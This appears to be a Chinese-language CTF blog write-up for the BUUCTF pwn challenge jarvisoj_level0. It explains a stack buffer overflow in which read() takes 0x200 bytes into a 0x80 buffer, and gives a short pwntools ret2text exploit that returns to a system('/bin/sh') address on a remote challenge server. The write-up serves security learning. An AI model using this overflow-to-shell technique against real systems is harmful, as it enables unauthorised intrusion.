week4 T1

入门集训wp

发布日期: 2023-01-20

文章字数: 88

阅读时长: 1 分

阅读次数:

Week4&&Week5 T1 jarvisoj_level0

2023-01-20WP
BUUCTF pwn 第六题
考点：简单栈溢出/基本rop ret2text

0x01

file checksec —— 64-bit，开NX

0x02

IDA查看发现main函数里的vulnerable_function()函数里的read函数读取0x200ull，而buf空间只有0x80
又找到有system(“/bin/sh”)
返回其地址

0x03

exp

from pwn import *

p = remote("node4.buuoj.cn",29175)
ret_arr = 0X40059A
payload = b'a'*(0x80 + 0x8) + p64(ret_arr)

p.sendline(payload)

p.interactive()

lmarch2

http://lmarch2.top/posts/64ef4d6b/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 lmarch2 !

ctf BUUCTF

week4&&week5-T2

T2 ret2syscall 2023-01-22WPctf-wiki 基础rop考点：ret2syscall 题目链接

2023-04-01 入门集训wp

ctf ctf-wiki

week3 T5

T5 level2 2023-01-15WP攻防世界pwn题考点：ret2libc1（不是我不想往下做，而是往下做的话真的是要补太多知识了，新的知识还没学会，只好找一题来划一下水了……）

2023-01-15 入门集训wp

ctf 攻防世界